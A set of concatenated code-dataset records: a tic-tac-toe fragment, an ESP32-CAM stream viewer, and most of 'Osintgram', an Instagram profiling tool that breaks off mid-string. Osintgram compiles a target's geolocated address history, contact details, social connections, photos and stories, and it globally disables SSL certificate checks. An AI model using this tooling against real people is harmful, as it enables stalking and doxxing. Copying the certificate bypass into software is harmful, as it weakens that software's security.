Choose row (from 1 to 3): '.format(player))\n col = input ('Choose column (from 1 to 3): ')\n if is_number(row) and is_number(col):\n flag = correct_turn(tab, int(row), int(col))\n else:\n print ('One of the parameters is not integer number! Try again!')\n return int(row), int(col)\n\ndef correct_turn(tab, row, col):\n flag = True\n if row < 1 or row > 3 or col < 1 or col > 3:\n print ('Out of range! Try again!')\n flag = False\n elif tab[row-1][col-1] != '_':\n print ('This cell is occupied! Try again!')\n flag = False\n \n return flag\n\ndef is_number (s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n \ndef the_end (tab, flag):\n flag = True\n for i in range (3):\n for j in range (3):\n if tab[i][j] == '_':\n flag = False\n if flag:\n print ('The end!')\n return flag\n\ndef end_of_the_game(tab):\n for i in range(3):\n for j in range (3):\n if tab[i][j] == '_':\n return False\n \n \n \nturns_flag = False \ntable = create_table()\nplayer1 = 'X'\nplayer2 = 'O'\nplayer = ''\nend_flag = False\ncount_turns = 0\n\n\nwhile turns_flag == False:\n \n for i in range(1,3):\n if i == 1:\n player = player1\n else:\n player = player2\n \n print_table(table)\n turn_row, turn_col = players_turns(table, i)\n count_turns += 1\n print(count_turns)\n turns(table, player, turn_row, turn_col)\n turns_flag = check_turn (table, player, turns_flag)\n if turns_flag or count_turns == 9:\n turns_flag = True\n break\n","repo_name":"katepodbelnaya/python-exercises","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6858061164","text":"import cv2\nimport requests\nimport numpy as np\nfrom io import BytesIO\nimport time\n\n# Replace with the URL of your ESP32-CAM's MJPEG stream\nurl = \"http://192.168.6.135\"\n\n# Initialize variables for FPS calculation\nstart_time = time.time()\nframe_count = 0\n\nwhile True:\n # Open a connection to the ESP32-CAM's MJPEG stream\n print(\"Connecting to the stream...\")\n response = requests.get(url, stream=True)\n print(\"Connected to the stream.\")\n\n if response.status_code == 200:\n print(\"Got a response from the stream.\")\n bytes = bytes()\n for chunk in response.iter_content(chunk_size=1024):\n bytes += chunk\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes = bytes[b+2:]\n frame = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n\n # Calculate and print FPS\n frame_count += 1\n elapsed_time = time.time() - start_time\n if elapsed_time >= 1.0: # Update FPS every 1 second\n fps = frame_count / elapsed_time\n print(f\"FPS: {fps:.2f}\")\n frame_count = 0\n start_time = time.time()\n\n # Display the frame\n cv2.imshow(\"ESP32-CAM Live Stream\", frame)\n\n # Press 'q' to exit the stream\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n print(\"Failed to connect to the stream. 
Check the URL.\")\n\n# Release resources\ncv2.destroyAllWindows()\n","repo_name":"Dinesh-Kumar-E/SafeJourney-AI","sub_path":"Arduino/live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23166740296","text":"import datetime\nimport json\nimport sys\nimport urllib\nimport os\nimport codecs\nfrom pathlib import Path\n\nimport requests\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nfrom geopy.geocoders import Nominatim\nfrom instagram_private_api import Client as AppClient\nfrom instagram_private_api import ClientCookieExpiredError, ClientLoginRequiredError, ClientError, ClientThrottledError\n\nfrom prettytable import PrettyTable\n\nfrom src import printcolors as pc\nfrom src import config\n\n\nclass Osintgram:\n api = None\n api2 = None\n geolocator = Nominatim(user_agent=\"http\")\n user_id = None\n target_id = None\n is_private = True\n following = False\n target = \"\"\n writeFile = False\n jsonDump = False\n cli_mode = False\n output_dir = \"output\"\n\n\n def __init__(self, target, is_file, is_json, is_cli, output_dir, clear_cookies):\n self.output_dir = output_dir or self.output_dir\n Path(self.output_dir).mkdir(parents=True, exist_ok=True)\n u = config.getUsername()\n p = config.getPassword()\n self.clear_cookies(clear_cookies)\n self.cli_mode = is_cli\n if not is_cli:\n print(\"\\nAttempt to login...\")\n self.login(u, p)\n self.setTarget(target)\n self.writeFile = is_file\n self.jsonDump = is_json\n\n def clear_cookies(self,clear_cookies):\n if clear_cookies:\n self.clear_cache()\n\n def setTarget(self, target):\n self.target = target\n user = self.get_user(target)\n self.target_id = user['id']\n self.is_private = user['is_private']\n self.following = self.check_following()\n self.__printTargetBanner__()\n\n def __get_feed__(self):\n data = []\n\n result = self.api.user_feed(str(self.target_id))\n data.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n data.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n return data\n\n def __get_comments__(self, media_id):\n comments = []\n\n result = self.api.media_comments(str(media_id))\n comments.extend(result.get('comments', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.media_comments(str(media_id), max_id=next_max_id)\n comments.extend(results.get('comments', []))\n next_max_id = results.get('next_max_id')\n\n return comments\n\n def __printTargetBanner__(self):\n pc.printout(\"\\nLogged as \", pc.GREEN)\n pc.printout(self.api.username, pc.CYAN)\n pc.printout(\". 
Target: \", pc.GREEN)\n pc.printout(str(self.target), pc.CYAN)\n pc.printout(\" [\" + str(self.target_id) + \"]\")\n if self.is_private:\n pc.printout(\" [PRIVATE PROFILE]\", pc.BLUE)\n if self.following:\n pc.printout(\" [FOLLOWING]\", pc.GREEN)\n else:\n pc.printout(\" [NOT FOLLOWING]\", pc.RED)\n\n print('\\n')\n\n def change_target(self):\n pc.printout(\"Insert new target username: \", pc.YELLOW)\n line = input()\n self.setTarget(line)\n return\n\n def get_addrs(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target localizations...\\n\")\n\n data = self.__get_feed__()\n\n locations = {}\n\n for post in data:\n if 'location' in post and post['location'] is not None:\n if 'lat' in post['location'] and 'lng' in post['location']:\n lat = post['location']['lat']\n lng = post['location']['lng']\n locations[str(lat) + ', ' + str(lng)] = post.get('taken_at')\n\n address = {}\n for k, v in locations.items():\n details = self.geolocator.reverse(k)\n unix_timestamp = datetime.datetime.fromtimestamp(v)\n address[details.address] = unix_timestamp.strftime('%Y-%m-%d %H:%M:%S')\n\n sort_addresses = sorted(address.items(), key=lambda p: p[1], reverse=True)\n\n if len(sort_addresses) > 0:\n t = PrettyTable()\n\n t.field_names = ['Post', 'Address', 'time']\n t.align[\"Post\"] = \"l\"\n t.align[\"Address\"] = \"l\"\n t.align[\"Time\"] = \"l\"\n pc.printout(\"\\nWoohoo! We found \" + str(len(sort_addresses)) + \" addresses\\n\", pc.GREEN)\n\n i = 1\n\n json_data = {}\n addrs_list = []\n\n for address, time in sort_addresses:\n t.add_row([str(i), address, time])\n\n if self.jsonDump:\n addr = {\n 'address': address,\n 'time': time\n }\n addrs_list.append(addr)\n\n i = i + 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_addrs.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['address'] = addrs_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_addrs.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_captions(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target captions...\\n\")\n\n captions = []\n\n data = self.__get_feed__()\n counter = 0\n\n try:\n for item in data:\n if \"caption\" in item:\n if item[\"caption\"] is not None:\n text = item[\"caption\"][\"text\"]\n captions.append(text)\n counter = counter + 1\n sys.stdout.write(\"\\rFound %i\" % counter)\n sys.stdout.flush()\n\n except AttributeError:\n pass\n\n except KeyError:\n pass\n\n json_data = {}\n\n if counter > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(counter) + \" captions\\n\", pc.GREEN)\n\n file = None\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_captions.txt\"\n file = open(file_name, \"w\")\n\n for s in captions:\n print(s + \"\\n\")\n\n if self.writeFile:\n file.write(s + \"\\n\")\n\n if self.jsonDump:\n json_data['captions'] = captions\n json_file_name = self.output_dir + \"/\" + self.target + \"_followings.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n if file is not None:\n file.close()\n\n else:\n pc.printout(\"Sorry! 
No results found :-(\\n\", pc.RED)\n\n return\n\n def get_total_comments(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target total comments...\\n\")\n\n comments_counter = 0\n posts = 0\n\n data = self.__get_feed__()\n\n for post in data:\n comments_counter += post['comment_count']\n posts += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_comments.txt\"\n file = open(file_name, \"w\")\n file.write(str(comments_counter) + \" comments in \" + str(posts) + \" posts\\n\")\n file.close()\n\n if self.jsonDump:\n json_data = {\n 'comment_counter': comments_counter,\n 'posts': posts\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_comments.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n pc.printout(str(comments_counter), pc.MAGENTA)\n pc.printout(\" comments in \" + str(posts) + \" posts\\n\")\n\n def get_comment_data(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Retrieving all comments, this may take a moment...\\n\")\n data = self.__get_feed__()\n \n _comments = []\n t = PrettyTable(['POST ID', 'ID', 'Username', 'Comment'])\n t.align[\"POST ID\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Comment\"] = \"l\"\n\n for post in data:\n post_id = post.get('id')\n comments = self.api.media_n_comments(post_id)\n for comment in comments:\n t.add_row([post_id, comment.get('user_id'), comment.get('user').get('username'), comment.get('text')])\n comment = {\n \"post_id\": post_id,\n \"user_id\":comment.get('user_id'), \n \"username\": comment.get('user').get('username'),\n \"comment\": comment.get('text')\n }\n _comments.append(comment)\n \n print(t)\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_comment_data.txt\"\n with open(file_name, 'w') as f:\n f.write(str(t))\n \n if self.jsonDump:\n file_name_json = self.output_dir + \"/\" + self.target + \"_comment_data.json\"\n with open(file_name_json, 'w') as f:\n f.write(\"{ \\\"Comments\\\":[ \\n\")\n # join the objects with commas so the dumped file is valid JSON\n f.write(',\\n'.join(json.dumps(comment) for comment in _comments) + '\\n')\n f.write(\"]} \")\n\n\n def get_followers(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target followers...\\n\")\n\n _followers = []\n followers = []\n\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_followers(str(self.target_id), rank_token=rank_token)\n\n _followers.extend(data.get('users', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followers\" % len(_followers))\n sys.stdout.flush()\n results = self.api.user_followers(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n _followers.extend(results.get('users', []))\n next_max_id = results.get('next_max_id')\n\n print(\"\\n\")\n \n for user in _followers:\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n t = PrettyTable(['ID', 'Username', 'Full Name'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n json_data = {}\n followings_list = []\n\n for node in followers:\n t.add_row([str(node['id']), node['username'], node['full_name']])\n\n if self.jsonDump:\n follow = {\n 'id': node['id'],\n 'username': node['username'],\n 'full_name': node['full_name']\n }\n followings_list.append(follow)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_followers.txt\"\n
 file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followers'] = followers\n json_file_name = self.output_dir + \"/\" + self.target + \"_followers.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n\n def get_followings(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target followings...\\n\")\n\n _followings = []\n followings = []\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n _followings.extend(data.get('users', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followings\" % len(_followings))\n sys.stdout.flush()\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n _followings.extend(results.get('users', []))\n next_max_id = results.get('next_max_id')\n\n print(\"\\n\")\n\n for user in _followings:\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n t = PrettyTable(['ID', 'Username', 'Full Name'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n json_data = {}\n followings_list = []\n\n for node in followings:\n t.add_row([str(node['id']), node['username'], node['full_name']])\n\n if self.jsonDump:\n follow = {\n 'id': node['id'],\n 'username': node['username'],\n 'full_name': node['full_name']\n }\n followings_list.append(follow)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_followings.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings'] = followings_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_followings.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n\n def get_hashtags(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target hashtags...\\n\")\n\n hashtags = []\n counter = 1\n texts = []\n\n data = self.api.user_feed(str(self.target_id))\n texts.extend(data.get('items', []))\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n texts.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n for post in texts:\n if post['caption'] is not None:\n caption = post['caption']['text']\n for s in caption.split():\n if s.startswith('#'):\n hashtags.append(s.encode('UTF-8'))\n counter += 1\n\n if len(hashtags) > 0:\n hashtag_counter = {}\n\n for i in hashtags:\n if i in hashtag_counter:\n hashtag_counter[i] += 1\n else:\n hashtag_counter[i] = 1\n\n ssort = sorted(hashtag_counter.items(), key=lambda value: value[1], reverse=True)\n\n file = None\n json_data = {}\n hashtags_list = []\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_hashtags.txt\"\n file = open(file_name, \"w\")\n\n for k, v in ssort:\n hashtag = str(k.decode('utf-8'))\n print(str(v) + \". \" + hashtag)\n if self.writeFile:\n file.write(str(v) + \". \" + hashtag + \"\\n\")\n if self.jsonDump:\n hashtags_list.append(hashtag)\n\n if file is not None:\n file.close()\n\n if self.jsonDump:\n json_data['hashtags'] = hashtags_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_hashtags.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! 
No results found :-(\\n\", pc.RED)\n\n def get_user_info(self):\n try:\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n content = self.api._call_api(endpoint)\n \n data = content['user_detail']['user']\n\n pc.printout(\"[ID] \", pc.GREEN)\n pc.printout(str(data['pk']) + '\\n')\n pc.printout(\"[FULL NAME] \", pc.RED)\n pc.printout(str(data['full_name']) + '\\n')\n pc.printout(\"[BIOGRAPHY] \", pc.CYAN)\n pc.printout(str(data['biography']) + '\\n')\n pc.printout(\"[FOLLOWED] \", pc.BLUE)\n pc.printout(str(data['follower_count']) + '\\n')\n pc.printout(\"[FOLLOW] \", pc.GREEN)\n pc.printout(str(data['following_count']) + '\\n')\n pc.printout(\"[BUSINESS ACCOUNT] \", pc.RED)\n pc.printout(str(data['is_business']) + '\\n')\n if data['is_business']:\n if not data['can_hide_category']:\n pc.printout(\"[BUSINESS CATEGORY] \")\n pc.printout(str(data['category']) + '\\n')\n pc.printout(\"[VERIFIED ACCOUNT] \", pc.CYAN)\n pc.printout(str(data['is_verified']) + '\\n')\n if 'public_email' in data and data['public_email']:\n pc.printout(\"[EMAIL] \", pc.BLUE)\n pc.printout(str(data['public_email']) + '\\n')\n pc.printout(\"[HD PROFILE PIC] \", pc.GREEN)\n pc.printout(str(data['hd_profile_pic_url_info']['url']) + '\\n')\n if 'fb_page_call_to_action_id' in data and data['fb_page_call_to_action_id']: \n pc.printout(\"[FB PAGE] \", pc.RED)\n pc.printout(str(data['connected_fb_page']) + '\\n')\n if 'whatsapp_number' in data and data['whatsapp_number']:\n pc.printout(\"[WHATSAPP NUMBER] \", pc.GREEN)\n pc.printout(str(data['whatsapp_number']) + '\\n')\n if 'city_name' in data and data['city_name']:\n pc.printout(\"[CITY] \", pc.YELLOW)\n pc.printout(str(data['city_name']) + '\\n')\n if 'address_street' in data and data['address_street']:\n pc.printout(\"[ADDRESS STREET] \", pc.RED)\n pc.printout(str(data['address_street']) + '\\n')\n if 'contact_phone_number' in data and data['contact_phone_number']:\n pc.printout(\"[CONTACT PHONE NUMBER] \", pc.CYAN)\n pc.printout(str(data['contact_phone_number']) + '\\n')\n\n if self.jsonDump:\n user = {\n 'id': data['pk'],\n 'full_name': data['full_name'],\n 'biography': data['biography'],\n 'edge_followed_by': data['follower_count'],\n 'edge_follow': data['following_count'],\n 'is_business_account': data['is_business'],\n 'is_verified': data['is_verified'],\n 'profile_pic_url_hd': data['hd_profile_pic_url_info']['url']\n }\n if 'public_email' in data and data['public_email']:\n user['email'] = data['public_email']\n if 'fb_page_call_to_action_id' in data and data['fb_page_call_to_action_id']: \n user['connected_fb_page'] = data['fb_page_call_to_action_id']\n if 'whatsapp_number' in data and data['whatsapp_number']:\n user['whatsapp_number'] = data['whatsapp_number']\n if 'city_name' in data and data['city_name']:\n user['city_name'] = data['city_name']\n if 'address_street' in data and data['address_street']:\n user['address_street'] = data['address_street']\n if 'contact_phone_number' in data and data['contact_phone_number']:\n user['contact_phone_number'] = data['contact_phone_number']\n\n json_file_name = self.output_dir + \"/\" + self.target + \"_info.json\"\n with open(json_file_name, 'w') as f:\n json.dump(user, f)\n\n except ClientError as e:\n print(e)\n pc.printout(\"Oops... 
\" + str(self.target) + \" non exist, please enter a valid username.\", pc.RED)\n pc.printout(\"\\n\")\n exit(2)\n\n def get_total_likes(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target total likes...\\n\")\n\n like_counter = 0\n posts = 0\n\n data = self.__get_feed__()\n\n for post in data:\n like_counter += post['like_count']\n posts += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_likes.txt\"\n file = open(file_name, \"w\")\n file.write(str(like_counter) + \" likes in \" + str(like_counter) + \" posts\\n\")\n file.close()\n\n if self.jsonDump:\n json_data = {\n 'like_counter': like_counter,\n 'posts': like_counter\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_likes.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n pc.printout(str(like_counter), pc.MAGENTA)\n pc.printout(\" likes in \" + str(posts) + \" posts\\n\")\n\n def get_media_type(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target captions...\\n\")\n\n counter = 0\n photo_counter = 0\n video_counter = 0\n\n data = self.__get_feed__()\n\n for post in data:\n if \"media_type\" in post:\n if post[\"media_type\"] == 1:\n photo_counter = photo_counter + 1\n elif post[\"media_type\"] == 2:\n video_counter = video_counter + 1\n counter = counter + 1\n sys.stdout.write(\"\\rChecked %i\" % counter)\n sys.stdout.flush()\n\n sys.stdout.write(\" posts\")\n sys.stdout.flush()\n\n if counter > 0:\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_mediatype.txt\"\n file = open(file_name, \"w\")\n file.write(str(photo_counter) + \" photos and \" + str(video_counter) + \" video posted by target\\n\")\n file.close()\n\n pc.printout(\"\\nWoohoo! We found \" + str(photo_counter) + \" photos and \" + str(video_counter) +\n \" video posted by target\\n\", pc.GREEN)\n\n if self.jsonDump:\n json_data = {\n \"photos\": photo_counter,\n \"videos\": video_counter\n }\n json_file_name = self.output_dir + \"/\" + self.target + \"_mediatype.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n else:\n pc.printout(\"Sorry! 
No results found :-(\\n\", pc.RED)\n\n def get_people_who_commented(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who commented...\\n\")\n\n data = self.__get_feed__()\n users = []\n\n for post in data:\n comments = self.__get_comments__(post['id'])\n for comment in comments:\n if not any(u['id'] == comment['user']['pk'] for u in users):\n user = {\n 'id': comment['user']['pk'],\n 'username': comment['user']['username'],\n 'full_name': comment['user']['full_name'],\n 'counter': 1\n }\n users.append(user)\n else:\n for user in users:\n if user['id'] == comment['user']['pk']:\n user['counter'] += 1\n break\n\n if len(users) > 0:\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Comments', 'ID', 'Username', 'Full Name']\n t.align[\"Comments\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_commented'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_people_who_tagged(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who tagged target...\\n\")\n\n posts = []\n\n result = self.api.usertag_feed(self.target_id)\n posts.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.usertag_feed(str(self.target_id), max_id=next_max_id) # paginate the usertag feed, not the user's own feed\n posts.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n if len(posts) > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(len(posts)) + \" photos\\n\", pc.GREEN)\n\n users = []\n\n for post in posts:\n if not any(u['id'] == post['user']['pk'] for u in users):\n user = {\n 'id': post['user']['pk'],\n 'username': post['user']['username'],\n 'full_name': post['user']['full_name'],\n 'counter': 1\n }\n users.append(user)\n else:\n for user in users:\n if user['id'] == post['user']['pk']:\n user['counter'] += 1\n break\n\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Photos', 'ID', 'Username', 'Full Name']\n t.align[\"Photos\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_tagged.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_tagged'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_tagged.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! 
No results found :-(\\n\", pc.RED)\n\n def get_photo_description(self):\n if self.check_private_profile():\n return\n\n content = requests.get(\"https://www.instagram.com/\" + str(self.target) + \"/?__a=1\")\n data = content.json()\n\n dd = data['graphql']['user']['edge_owner_to_timeline_media']['edges']\n\n if len(dd) > 0:\n pc.printout(\"\\nWoohoo! We found \" + str(len(dd)) + \" descriptions\\n\", pc.GREEN)\n\n count = 1\n\n t = PrettyTable(['Photo', 'Description'])\n t.align[\"Photo\"] = \"l\"\n t.align[\"Description\"] = \"l\"\n\n json_data = {}\n descriptions_list = []\n\n for i in dd:\n node = i.get('node')\n descr = node.get('accessibility_caption')\n t.add_row([str(count), descr])\n\n if self.jsonDump:\n description = {\n 'description': descr\n }\n descriptions_list.append(description)\n\n count += 1\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_photodes.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['descriptions'] = descriptions_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_descriptions.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_user_photo(self):\n if self.check_private_profile():\n return\n\n limit = -1\n if self.cli_mode:\n user_input = \"\"\n else:\n pc.printout(\"How many photos you want to download (default all): \", pc.YELLOW)\n user_input = input()\n \n try:\n if user_input == \"\":\n pc.printout(\"Downloading all photos available...\\n\")\n else:\n limit = int(user_input)\n pc.printout(\"Downloading \" + user_input + \" photos...\\n\")\n\n except ValueError:\n pc.printout(\"Wrong value entered\\n\", pc.RED)\n return\n\n data = []\n counter = 0\n\n result = self.api.user_feed(str(self.target_id))\n data.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n data.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n try:\n for item in data:\n if counter == limit:\n break\n if \"image_versions2\" in item:\n counter = counter + 1\n url = item[\"image_versions2\"][\"candidates\"][0][\"url\"]\n photo_id = item[\"id\"]\n end = self.output_dir + \"/\" + self.target + \"_\" + photo_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n sys.stdout.write(\"\\rDownloaded %i\" % counter)\n sys.stdout.flush()\n else:\n carousel = item[\"carousel_media\"]\n for i in carousel:\n if counter == limit:\n break\n counter = counter + 1\n url = i[\"image_versions2\"][\"candidates\"][0][\"url\"]\n photo_id = i[\"id\"]\n end = self.output_dir + \"/\" + self.target + \"_\" + photo_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n sys.stdout.write(\"\\rDownloaded %i\" % counter)\n sys.stdout.flush()\n\n except AttributeError:\n pass\n\n except KeyError:\n pass\n\n sys.stdout.write(\" photos\")\n sys.stdout.flush()\n\n pc.printout(\"\\nWoohoo! 
We downloaded \" + str(counter) + \" photos (saved in \" + self.output_dir + \" folder) \\n\", pc.GREEN)\n\n def get_user_propic(self):\n\n try:\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n content = self.api._call_api(endpoint)\n\n data = content['user_detail']['user']\n\n if \"hd_profile_pic_url_info\" in data:\n URL = data[\"hd_profile_pic_url_info\"]['url']\n else:\n #get better quality photo\n items = len(data['hd_profile_pic_versions'])\n URL = data[\"hd_profile_pic_versions\"][items-1]['url']\n\n if URL != \"\":\n end = self.output_dir + \"/\" + self.target + \"_propic.jpg\"\n urllib.request.urlretrieve(URL, end)\n pc.printout(\"Target propic saved in output folder\\n\", pc.GREEN)\n\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n \n except ClientError as e:\n error = json.loads(e.error_response)\n print(error['message'])\n print(error['error_title'])\n exit(2)\n\n def get_user_stories(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for target stories...\\n\")\n\n data = self.api.user_reel_media(str(self.target_id))\n\n counter = 0\n\n if data['items'] is not None: # no stories avaibile\n counter = data['media_count']\n for i in data['items']:\n story_id = i[\"id\"]\n if i[\"media_type\"] == 1: # it's a photo\n url = i['image_versions2']['candidates'][0]['url']\n end = self.output_dir + \"/\" + self.target + \"_\" + story_id + \".jpg\"\n urllib.request.urlretrieve(url, end)\n\n elif i[\"media_type\"] == 2: # it's a gif or video\n url = i['video_versions'][0]['url']\n end = self.output_dir + \"/\" + self.target + \"_\" + story_id + \".mp4\"\n urllib.request.urlretrieve(url, end)\n\n if counter > 0:\n pc.printout(str(counter) + \" target stories saved in output folder\\n\", pc.GREEN)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_people_tagged_by_user(self):\n pc.printout(\"Searching for users tagged by target...\\n\")\n\n ids = []\n username = []\n full_name = []\n post = []\n counter = 1\n\n data = self.__get_feed__()\n\n try:\n for i in data:\n if \"usertags\" in i:\n c = i.get('usertags').get('in')\n for cc in c:\n if cc.get('user').get('pk') not in ids:\n ids.append(cc.get('user').get('pk'))\n username.append(cc.get('user').get('username'))\n full_name.append(cc.get('user').get('full_name'))\n post.append(1)\n else:\n index = ids.index(cc.get('user').get('pk'))\n post[index] += 1\n counter = counter + 1\n except AttributeError as ae:\n pc.printout(\"\\nERROR: an error occurred: \", pc.RED)\n print(ae)\n print(\"\")\n pass\n\n if len(ids) > 0:\n t = PrettyTable()\n\n t.field_names = ['Posts', 'Full Name', 'Username', 'ID']\n t.align[\"Posts\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n\n pc.printout(\"\\nWoohoo! 
